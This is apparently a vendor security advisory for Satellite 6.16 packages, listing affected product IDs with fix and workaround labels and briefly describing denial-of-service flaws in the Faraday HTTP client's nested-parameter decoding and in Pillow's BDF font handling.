| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
A flaw was found in Faraday, an HTTP client library. The Faraday::NestedParamsEncoder, which handles nested query parameters, does not limit the depth of nested query strings during decoding. A remote attacker can exploit this by sending a specially crafted query string, causing the application to build an excessively deep data structure. This can lead to a SystemStackError, resulting in a Denial of Service (DoS) by crashing the application's processing thread or worker.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by providing a specially crafted BDF font file. The library's image processing function fails to properly validate dimensions from the font file, bypassing a critical security check designed to prevent excessive memory usage. This oversight can lead to the system consuming an unreasonable amount of memory, making it unavailable to legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
